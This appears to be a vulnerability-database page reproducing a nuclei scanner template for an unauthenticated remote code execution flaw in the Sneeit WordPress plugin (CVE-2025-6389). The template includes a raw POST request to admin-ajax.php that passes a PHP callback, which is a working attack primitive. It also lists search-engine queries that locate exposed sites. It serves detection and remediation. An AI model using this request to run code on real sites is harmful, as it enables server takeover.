Lucene search
+L

Sneeit WP Social WordPress Plugin - Unauthenticated RCE via call_user_func

🗓️ 25 Aug 2026 06:03:40Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 11 Views

Unauthenticated remote code execution in Sneeit WordPress plugin via call_user_func.

Related
Refs
Code
id: CVE-2025-6389

info:
  name: Sneeit WP Social WordPress Plugin - Unauthenticated RCE via call_user_func
  author: DhiyaneshDk
  severity: critical
  description: |
    The Sneeit Framework plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 8.3 via the sneeit_articles_pagination_callback() function. This is due to the function accepting user input and then passing that through call_user_func(). This makes it possible for unauthenticated attackers to execute code on the server which can be leveraged to inject backdoors or, for example, create new administrative user accounts.
  impact: |
    Unauthenticated attackers can execute arbitrary code remotely, potentially injecting backdoors or creating new admin accounts.
  remediation: |
    Update to the latest version beyond 8.3.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6389
    - https://www.cve.org/CVERecord?id=CVE-2025-6389
    - https://github.com/Nxploited/CVE-2025-6389
    - https://github.com/itsismarcos/SneeitScanner-CVE-2025-6389
    - https://wpscan.com/vulnerability/CVE-2025-6389
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-6389
    cwe-id: CWE-94
    epss-score: 0.76138
    epss-percentile: 0.99492
  metadata:
    verified: true
    max-request: 1
    vendor: sneeit
    product: sneeit-framework
    framework: wordpress
    fofa-query: '"sneeit_articles_pagination"'
    shodan-query: http.html:"/wp-content/plugins/wp-social/"
    publicwww-query: "/wp-content/plugins/wp-social/"
  tags: cve,cve2025,wordpress,wp-plugin,sneeit,rce,unauth,vkev,intrusive,vuln,file-upload

variables:
  marker: "{{randstr}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=sneeit_articles_pagination&callback=var_dump&args=%5B%22{{marker}}%22%5D

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "array(1)"
          - "{{marker}}"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        regex:
          - 'string\(\d+\) "([^"]+)"'
        group: 1
# digest: 4a0a00473045022100ab81735ad52654fa2f45ac1f140e5507333450c61b31d4202bec92c71c02b17b02207119c0db335b84c8612fafe7b1bd15e17ef1957303426a08ca5ffa7d4c009e80:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation